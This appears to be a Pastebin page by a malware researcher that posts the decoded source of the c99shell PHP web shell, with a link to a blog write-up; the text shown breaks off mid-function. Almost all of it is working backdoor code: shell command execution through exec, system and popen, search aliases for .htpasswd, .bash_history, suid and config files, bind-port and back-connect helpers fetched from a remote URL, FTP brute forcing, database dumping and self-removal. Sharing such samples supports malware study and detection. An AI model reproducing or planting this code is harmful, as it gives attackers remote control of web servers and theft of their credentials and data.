Need a unique gift idea?
A Pastebin account makes a great Christmas gift
SHARE
TWEET

Decoded PHP/c99shell

bartblaze Mar 3rd, 2015 (edited) 11,163 Never
Upgrade to PRO!
ENDING IN00days00hours00mins00secs
 
  1. Decoded PHP backdoor "c99shell". More information on:
  2. http://bartblaze.blogspot.com/2015/03/c99shell-not-dead.html
  3.  
  4. <?php
  5. if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
  6. error_reporting(5);
  7. @ignore_user_abort(TRUE);
  8. @set_magic_quotes_runtime(0);
  9. $win = strtolower(substr(PHP_OS,0,3)) == "win";
  10. define("starttime",getmicrotime());
  11. if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
  12. $_REQUEST = array_merge($_COOKIE,$_POST);
  13. foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
  14. $shver = "2.1 madnet edition ADVANCED";
  15. if (empty($surl))
  16. {
  17.  $surl = $_SERVER['PHP_SELF'];
  18. }
  19. $surl = htmlspecialchars($surl);
  20.  
  21. $timelimit = 0;
  22. $host_allow = array("*");
  23. $login_txt = "Admin area";
  24. $accessdeniedmess = "die like the rest";
  25. $gzipencode = TRUE;
  26. $c99sh_sourcesurl = ""; //Sources-server
  27. $filestealth = TRUE;
  28. $donated_html = "";
  29. $donated_act = array("");
  30. $curdir = "./";
  31. $tmpdir = "";
  32. $tmpdir_log = "./";
  33.  
  34. $log_email = "user@host.gov";
  35. $sort_default = "0a";
  36. $sort_save = TRUE;
  37.  
  38. $ftypes  = array(
  39.  "html"=>array("html","htm","shtml"),
  40.  "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  41.  "exe"=>array("sh","install","bat","cmd"),
  42.  "ini"=>array("ini","inf"),
  43.  "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  44.  "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  45.  "sdb"=>array("sdb"),
  46.  "phpsess"=>array("sess"),
  47.  "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
  48. );
  49.  
  50.  
  51. $exeftypes  = array(
  52.  getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  53.  "perl %f%" => array("pl","cgi")
  54. );
  55.  
  56. $regxp_highlight  = array(
  57.   array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"),
  58.   array("config.php",1) // example
  59. );
  60.  
  61. $safemode_diskettes = array("a");
  62. $hexdump_lines = 8;
  63. $hexdump_rows = 24;
  64. $nixpwdperpage = 100;
  65. $bindport_pass = "c99mad";
  66. $bindport_port = "31373";
  67. $bc_port = "31373";
  68. $datapipe_localport = "8081";
  69. if (!$win)
  70. {
  71.  $cmdaliases = array(
  72.   array("-----------------------------------------------------------", "ls -la"),
  73.   array("find all suid files", "find / -type f -perm -04000 -ls"),
  74.   array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
  75.   array("find all sgid files", "find / -type f -perm -02000 -ls"),
  76.   array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  77.   array("find config.inc.php files", "find / -type f -name config.inc.php"),
  78.   array("find config* files", "find / -type f -name \"config*\""),
  79.   array("find config* files in current dir", "find . -type f -name \"config*\""),
  80.   array("find all writable folders and files", "find / -perm -2 -ls"),
  81.   array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
  82.   array("find all service.pwd files", "find / -type f -name service.pwd"),
  83.   array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
  84.   array("find all .htpasswd files", "find / -type f -name .htpasswd"),
  85.   array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  86.   array("find all .bash_history files", "find / -type f -name .bash_history"),
  87.   array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
  88.   array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  89.   array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  90.   array("list file attributes on a Linux second extended file system", "lsattr -va"),
  91.   array("show opened ports", "netstat -an | grep -i listen")
  92.  );
  93. }
  94. else
  95. {
  96.  $cmdaliases = array(
  97.   array("-----------------------------------------------------------", "dir"),
  98.   array("show opened ports", "netstat -an")
  99.  );
  100. }
  101.  
  102. $sess_cookie = "c99shvars";
  103.  
  104. $usefsbuff = TRUE;
  105. $copy_unset = FALSE;
  106.  
  107. $quicklaunch = array(
  108.  array("<b><hr>HOME</b>",$surl),
  109.  array("<b><=</b>","#\" onclick=\"history.back(1)"),
  110.  array("<b>=></b>","#\" onclick=\"history.go(1)"),
  111.  array("<b>UPDIR</b>","#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='%upd';document.todo.sort.value='%sort';document.todo.submit();"),
  112.  array("<b>Search</b>","#\" onclick=\"document.todo.act.value='search';document.todo.d.value='%d';document.todo.submit();"),
  113.  array("<b>Buffer</b>","#\" onclick=\"document.todo.act.value='fsbuff';document.todo.d.value='%d';document.todo.submit();"),
  114.  array("<b>Tools</b>","#\" onclick=\"document.todo.act.value='tools';document.todo.d.value='%d';document.todo.submit();"),
  115.  array("<b>Proc.</b>","#\" onclick=\"document.todo.act.value='processes';document.todo.d.value='%d';document.todo.submit();"),
  116.  array("<b>FTP brute</b>","#\" onclick=\"document.todo.act.value='ftpquickbrute';document.todo.d.value='%d';document.todo.submit();"),
  117.  array("<b>Sec.</b>","#\" onclick=\"document.todo.act.value='security';document.todo.d.value='%d';document.todo.submit();"),
  118.  array("<b>SQL</b>","#\" onclick=\"document.todo.act.value='sql';document.todo.d.value='%d';document.todo.submit();"),
  119.  array("<b>PHP-code</b>","#\" onclick=\"document.todo.act.value='eval';document.todo.d.value='%d';document.todo.submit();"),
  120.  array("<b>Self remove</b>","#\" onclick=\"document.todo.act.value='selfremove';document.todo.submit();"),
  121.  array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
  122. );
  123.  
  124. $highlight_background = "#c0c0c0";
  125. $highlight_bg = "#FFFFFF";
  126. $highlight_comment = "#6A6A6A";
  127. $highlight_default = "#0000BB";
  128. $highlight_html = "#1300FF";
  129. $highlight_keyword = "#007700";
  130. $highlight_string = "#000000";
  131.  
  132. @$f = $_REQUEST["f"];
  133. @extract($_REQUEST["c99shcook"]);
  134. /////////////////////////////////////
  135. @set_time_limit(0);
  136. $tmp = array();
  137. foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
  138. $s = "!^(".implode("|",$tmp).")$!i";
  139. if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://securityprobe.net\">c99madshell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
  140. if (!empty($login))
  141. {
  142.  if (empty($md5_pass)) {$md5_pass = md5($pass);}
  143.  if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
  144.  {
  145.   if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
  146.   header("WWW-Authenticate: Basic realm=\"".$login_txt."\"");
  147.   header("HTTP/1.0 401 Unauthorized");
  148.   exit($accessdeniedmess);
  149.  }
  150. }
  151.  
  152. if (isset($_POST['act'])) $act  = $_POST['act'];
  153. if (isset($_POST['d'])) $d    = urldecode($_POST['d']);
  154. if (isset($_POST['sort'])) $sort = $_POST['sort'];
  155. if (isset($_POST['f'])) $f    = $_POST['f'];
  156. if (isset($_POST['ft'])) $ft   = $_POST['ft'];
  157. if (isset($_POST['grep'])) $grep = $_POST['grep'];
  158. if (isset($_POST['processes_sort'])) $processes_sort = $_POST['processes_sort'];
  159. if (isset($_POST['pid'])) $pid  = $_POST['pid'];
  160. if (isset($_POST['sig'])) $sig  = $_POST['sig'];
  161. if (isset($_POST['base64'])) $base64  = $_POST['base64'];
  162. if (isset($_POST['fullhexdump'])) $fullhexdump  = $_POST['fullhexdump'];
  163. if (isset($_POST['c'])) $c  = $_POST['c'];
  164. if (isset($_POST['white'])) $white  = $_POST['white'];
  165. if (isset($_POST['nixpasswd'])) $nixpasswd  = $_POST['nixpasswd'];
  166.  
  167. $lastdir = realpath(".");
  168. chdir($curdir);
  169. $sess_data = unserialize($_COOKIE["$sess_cookie"]);
  170. if (!is_array($sess_data)) {$sess_data = array();}
  171. if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  172. if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  173.  
  174. $disablefunc = @ini_get("disable_functions");
  175. if (!empty($disablefunc))
  176. {
  177.  $disablefunc = str_replace(" ","",$disablefunc);
  178.  $disablefunc = explode(",",$disablefunc);
  179. }
  180.  
  181. if (!function_exists("c99_buff_prepare"))
  182. {
  183. function c99_buff_prepare()
  184. {
  185.  global $sess_data;
  186.  global $act;
  187.  foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  188.  foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  189.  $sess_data["copy"] = array_unique($sess_data["copy"]);
  190.  $sess_data["cut"] = array_unique($sess_data["cut"]);
  191.  sort($sess_data["copy"]);
  192.  sort($sess_data["cut"]);
  193.  if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
  194.  else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
  195. }
  196. }
  197. c99_buff_prepare();
  198. if (!function_exists("c99_sess_put"))
  199. {
  200. function c99_sess_put($data)
  201. {
  202.  global $sess_cookie;
  203.  global $sess_data;
  204.  c99_buff_prepare();
  205.  $sess_data = $data;
  206.  $data = serialize($data);
  207.  setcookie($sess_cookie,$data);
  208. }
  209. }
  210. foreach (array("sort","sql_sort") as $v)
  211. {
  212.  if (!empty($_POST[$v])) {$$v = $_POST[$v];}
  213. }
  214. if ($sort_save)
  215. {
  216.  if (!empty($sort)) {setcookie("sort",$sort);}
  217.  if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
  218. }
  219. if (!function_exists("str2mini"))
  220. {
  221. function str2mini($content,$len)
  222. {
  223.  if (strlen($content) > $len)
  224.  {
  225.   $len = ceil($len/2) - 2;
  226.   return substr($content, 0,$len)."...".substr($content,-$len);
  227.  }
  228.  else {return $content;}
  229. }
  230. }
  231. if (!function_exists("view_size"))
  232. {
  233. function view_size($size)
  234. {
  235.  if (!is_numeric($size)) {return FALSE;}
  236.  else
  237.  {
  238.   if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  239.   elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  240.   elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  241.   else {$size = $size . " B";}
  242.   return $size;
  243.  }
  244. }
  245. }
  246. if (!function_exists("fs_copy_dir"))
  247. {
  248. function fs_copy_dir($d,$t)
  249. {
  250.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  251.  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  252.  $h = opendir($d);
  253.  while (($o = readdir($h)) !== FALSE)
  254.  {
  255.   if (($o != ".") and ($o != ".."))
  256.   {
  257.    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  258.    else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  259.    if (!$ret) {return $ret;}
  260.   }
  261.  }
  262.  closedir($h);
  263.  return TRUE;
  264. }
  265. }
  266. if (!function_exists("fs_copy_obj"))
  267. {
  268. function fs_copy_obj($d,$t)
  269. {
  270.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  271.  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  272.  if (!is_dir(dirname($t))) {mkdir(dirname($t));}
  273.  if (is_dir($d))
  274.  {
  275.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  276.   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  277.   return fs_copy_dir($d,$t);
  278.  }
  279.  elseif (is_file($d)) {return copy($d,$t);}
  280.  else {return FALSE;}
  281. }
  282. }
  283. if (!function_exists("fs_move_dir"))
  284. {
  285. function fs_move_dir($d,$t)
  286. {
  287.  $h = opendir($d);
  288.  if (!is_dir($t)) {mkdir($t);}
  289.  while (($o = readdir($h)) !== FALSE)
  290.  {
  291.   if (($o != ".") and ($o != ".."))
  292.   {
  293.    $ret = TRUE;
  294.    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  295.    else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
  296.    if (!$ret) {return $ret;}
  297.   }
  298.  }
  299.  closedir($h);
  300.  return TRUE;
  301. }
  302. }
  303. if (!function_exists("fs_move_obj"))
  304. {
  305. function fs_move_obj($d,$t)
  306. {
  307.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  308.  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  309.  if (is_dir($d))
  310.  {
  311.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  312.   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  313.   return fs_move_dir($d,$t);
  314.  }
  315.  elseif (is_file($d))
  316.  {
  317.   if(copy($d,$t)) {return unlink($d);}
  318.   else {unlink($t); return FALSE;}
  319.  }
  320.  else {return FALSE;}
  321. }
  322. }
  323. if (!function_exists("fs_rmdir"))
  324. {
  325. function fs_rmdir($d)
  326. {
  327.  $h = opendir($d);
  328.  while (($o = readdir($h)) !== FALSE)
  329.  {
  330.   if (($o != ".") and ($o != ".."))
  331.   {
  332.    if (!is_dir($d.$o)) {unlink($d.$o);}
  333.    else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  334.   }
  335.  }
  336.  closedir($h);
  337.  rmdir($d);
  338.  return !is_dir($d);
  339. }
  340. }
  341. if (!function_exists("fs_rmobj"))
  342. {
  343. function fs_rmobj($o)
  344. {
  345.  $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
  346.  if (is_dir($o))
  347.  {
  348.   if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  349.   return fs_rmdir($o);
  350.  }
  351.  elseif (is_file($o)) {return unlink($o);}
  352.  else {return FALSE;}
  353. }
  354. }
  355. if (!function_exists("myshellexec"))
  356. {
  357. function myshellexec($cmd)
  358. {
  359.  global $disablefunc;
  360.  $result = "";
  361.  if (!empty($cmd))
  362.  {
  363.   if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  364.   elseif (($result = `$cmd`) !== FALSE) {}
  365.   elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  366.   elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  367.   elseif (is_resource($fp = popen($cmd,"r")))
  368.   {
  369.    $result = "";
  370.    while(!feof($fp)) {$result .= fread($fp,1024);}
  371.    pclose($fp);
  372.   }
  373.  }
  374.  return $result;
  375. }
  376. }
  377. if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
  378. if (!function_exists("view_perms"))
  379. {
  380. function view_perms($mode)
  381. {
  382.  if (($mode & 0xC000) === 0xC000) {$type = "s";}
  383.  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  384.  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  385.  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  386.  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  387.  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  388.  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  389.  else {$type = "?";}
  390.  
  391.  $owner["read"] = ($mode & 00400)?"r":"-";
  392.  $owner["write"] = ($mode & 00200)?"w":"-";
  393.  $owner["execute"] = ($mode & 00100)?"x":"-";
  394.  $group["read"] = ($mode & 00040)?"r":"-";
  395.  $group["write"] = ($mode & 00020)?"w":"-";
  396.  $group["execute"] = ($mode & 00010)?"x":"-";
  397.  $world["read"] = ($mode & 00004)?"r":"-";
  398.  $world["write"] = ($mode & 00002)? "w":"-";
  399.  $world["execute"] = ($mode & 00001)?"x":"-";
  400.  
  401.  if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
  402.  if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
  403.  if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
  404.  
  405.  return $type.join("",$owner).join("",$group).join("",$world);
  406. }
  407. }
  408. if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
  409. if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
  410. if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
  411. if (!function_exists("parse_perms"))
  412. {
  413. function parse_perms($mode)
  414. {
  415.  if (($mode & 0xC000) === 0xC000) {$t = "s";}
  416.  elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
  417.  elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
  418.  elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
  419.  elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
  420.  elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
  421.  elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
  422.  else {$t = "?";}
  423.  $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
  424.  $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
  425.  $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
  426.  return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
  427. }
  428. }
  429. if (!function_exists("parsesort"))
  430. {
  431. function parsesort($sort)
  432. {
  433.  $one = intval($sort);
  434.  $second = substr($sort,-1);
  435.  if ($second != "d") {$second = "a";}
  436.  return array($one,$second);
  437. }
  438. }
  439. if (!function_exists("view_perms_color"))
  440. {
  441. function view_perms_color($o)
  442. {
  443.  if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
  444.  elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
  445.  else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
  446. }
  447. }
  448. if (!function_exists("c99getsource"))
  449. {
  450. function c99getsource($fn)
  451. {
  452.  global $c99sh_sourcesurl;
  453.  $array = array(
  454.   "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
  455.   "c99sh_bindport.c" => "c99sh_bindport_c.txt",
  456.   "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
  457.   "c99sh_backconn.c" => "c99sh_backconn_c.txt",
  458.   "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
  459.   "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
  460.  );
  461.  $name = $array[$fn];
  462.  if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
  463.  else {return FALSE;}
  464. }
  465. }
  466. if (!function_exists("mysql_dump"))
  467. {
  468. function mysql_dump($set)
  469. {
  470.  global $shver;
  471.  $sock = $set["sock"];
  472.  $db = $set["db"];
  473.  $print = $set["print"];
  474.  $nl2br = $set["nl2br"];
  475.  $file = $set["file"];
  476.  $add_drop = $set["add_drop"];
  477.  $tabs = $set["tabs"];
  478.  $onlytabs = $set["onlytabs"];
  479.  $ret = array();
  480.  $ret["err"] = array();
  481.  if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  482.  if (empty($db)) {$db = "db";}
  483.  if (empty($print)) {$print = 0;}
  484.  if (empty($nl2br)) {$nl2br = 0;}
  485.  if (empty($add_drop)) {$add_drop = TRUE;}
  486.  if (empty($file))
  487.  {
  488.   $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
  489.  }
  490.  if (!is_array($tabs)) {$tabs = array();}
  491.  if (empty($add_drop)) {$add_drop = TRUE;}
  492.  if (sizeof($tabs) == 0)
  493.  {
  494.   // retrive tables-list
  495.   $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  496.   if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  497.  }
  498.  $out = "# Dumped by C99madShell.SQL v. ".$shver."
  499. # Home page: http://securityprobe.net
  500. #
  501. # Host settings:
  502. # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
  503. # Date: ".date("d.m.Y H:i:s")."
  504. # DB: \"".$db."\"
  505. #---------------------------------------------------------
  506. ";
  507.  $c = count($onlytabs);
  508.  foreach($tabs as $tab)
  509.  {
  510.   if ((in_array($tab,$onlytabs)) or (!$c))
  511.   {
  512.    if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  513.    // recieve query for create table structure
  514.    $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  515.    if (!$res) {$ret["err"][] = mysql_smarterror();}
  516.    else
  517.    {
  518.     $row = mysql_fetch_row($res);
  519.     $out .= $row["1"].";\n\n";
  520.     // recieve table variables
  521.     $res = mysql_query("SELECT * FROM `$tab`", $sock);
  522.     if (mysql_num_rows($res) > 0)
  523.     {
  524.      while ($row = mysql_fetch_assoc($res))
  525.      {
  526.       $keys = implode("`, `", array_keys($row));
  527.       $values = array_values($row);
  528.       foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  529.       $values = implode("', '", $values);
  530.       $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  531.       $out .= $sql;
  532.      }
  533.     }
  534.    }
  535.   }
  536.  }
  537.  $out .= "#---------------------------------------------------------------------------------\n\n";
  538.  if ($file)
  539.  {
  540.   $fp = fopen($file, "w");
  541.   if (!$fp) {$ret["err"][] = 2;}
  542.   else
  543.   {
  544.    fwrite ($fp, $out);
  545.    fclose ($fp);
  546.   }
  547.  }
  548.  if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  549.  return $out;
  550. }
  551. }
  552. if (!function_exists("mysql_buildwhere"))
  553. {
  554. function mysql_buildwhere($array,$sep=" and",$functs=array())
  555. {
  556.  if (!is_array($array)) {$array = array();}
  557.  $result = "";
  558.  foreach($array as $k=>$v)
  559.  {
  560.   $value = "";
  561.   if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  562.   $value .= "'".addslashes($v)."'";
  563.   if (!empty($functs[$k])) {$value .= ")";}
  564.   $result .= "`".$k."` = ".$value.$sep;
  565.  }
  566.  $result = substr($result,0,strlen($result)-strlen($sep));
  567.  return $result;
  568. }
  569. }
  570. if (!function_exists("mysql_fetch_all"))
  571. {
  572. function mysql_fetch_all($query,$sock)
  573. {
  574.  if ($sock) {$result = mysql_query($query,$sock);}
  575.  else {$result = mysql_query($query);}
  576.  $array = array();
  577.  while ($row = mysql_fetch_array($result)) {$array[] = $row;}
  578.  mysql_free_result($result);
  579.  return $array;
  580. }
  581. }
  582. if (!function_exists("mysql_smarterror"))
  583. {
  584. function mysql_smarterror($type,$sock)
  585. {
  586.  if ($sock) {$error = mysql_error($sock);}
  587.  else {$error = mysql_error();}
  588.  $error = htmlspecialchars($error);
  589.  return $error;
  590. }
  591. }
  592. if (!function_exists("mysql_query_form"))
  593. {
  594. function mysql_query_form()
  595. {
  596.  global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
  597.  $sql_query = urldecode($sql_query);
  598.  if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  599.  if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  600.  if ((!$submit) or ($sql_act))
  601.  {
  602.   echo "<table border=0><tr><td><form method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
  603.   if ($tbl_struct)
  604.   {
  605.    echo "<td valign=\"top\"><b>Fields:</b><br>";
  606.    foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
  607.    echo "</td></tr></table>";
  608.   }
  609.  }
  610.  if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
  611. }
  612. }
  613. if (!function_exists("mysql_create_db"))
  614. {
  615. function mysql_create_db($db,$sock="")
  616. {
  617.  $sql = "CREATE DATABASE `".addslashes($db)."`;";
  618.  if ($sock) {return mysql_query($sql,$sock);}
  619.  else {return mysql_query($sql);}
  620. }
  621. }
  622. if (!function_exists("mysql_query_parse"))
  623. {
  624. function mysql_query_parse($query)
  625. {
  626.  $query = trim($query);
  627.  $arr = explode (" ",$query);
  628.  /*array array()
  629.  {
  630.   "METHOD"=>array(output_type),
  631.   "METHOD1"...
  632.   ...
  633.  }
  634.  if output_type == 0, no output,
  635.  if output_type == 1, no output if no error
  636.  if output_type == 2, output without control-buttons
  637.  if output_type == 3, output with control-buttons
  638.  */
  639.  $types = array(
  640.   "SELECT"=>array(3,1),
  641.   "SHOW"=>array(2,1),
  642.   "DELETE"=>array(1),
  643.   "DROP"=>array(1)
  644.  );
  645.  $result = array();
  646.  $op = strtoupper($arr[0]);
  647.  if (is_array($types[$op]))
  648.  {
  649.   $result["propertions"] = $types[$op];
  650.   $result["query"]  = $query;
  651.   if ($types[$op] == 2)
  652.   {
  653.    foreach($arr as $k=>$v)
  654.    {
  655.     if (strtoupper($v) == "LIMIT")
  656.     {
  657.      $result["limit"] = $arr[$k+1];
  658.      $result["limit"] = explode(",",$result["limit"]);
  659.      if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
  660.      unset($arr[$k],$arr[$k+1]);
  661.     }
  662.    }
  663.   }
  664.  }
  665.  else {return FALSE;}
  666. }
  667. }
  668. if (!function_exists("c99fsearch"))
  669. {
  670. function c99fsearch($d)
  671. {
  672.  global $found;
  673.  global $found_d;
  674.  global $found_f;
  675.  global $search_i_f;
  676.  global $search_i_d;
  677.  global $a;
  678.  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  679.  $h = opendir($d);
  680.  while (($f = readdir($h)) !== FALSE)
  681.  {
  682.   if($f != "." && $f != "..")
  683.   {
  684.    $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
  685.    if (is_dir($d.$f))
  686.    {
  687.     $search_i_d++;
  688.     if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
  689.     if (!is_link($d.$f)) {c99fsearch($d.$f);}
  690.    }
  691.    else
  692.    {
  693.     $search_i_f++;
  694.     if ($bool)
  695.     {
  696.      if (!empty($a["text"]))
  697.      {
  698.       $r = @file_get_contents($d.$f);
  699.       if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
  700.       if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
  701.       if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
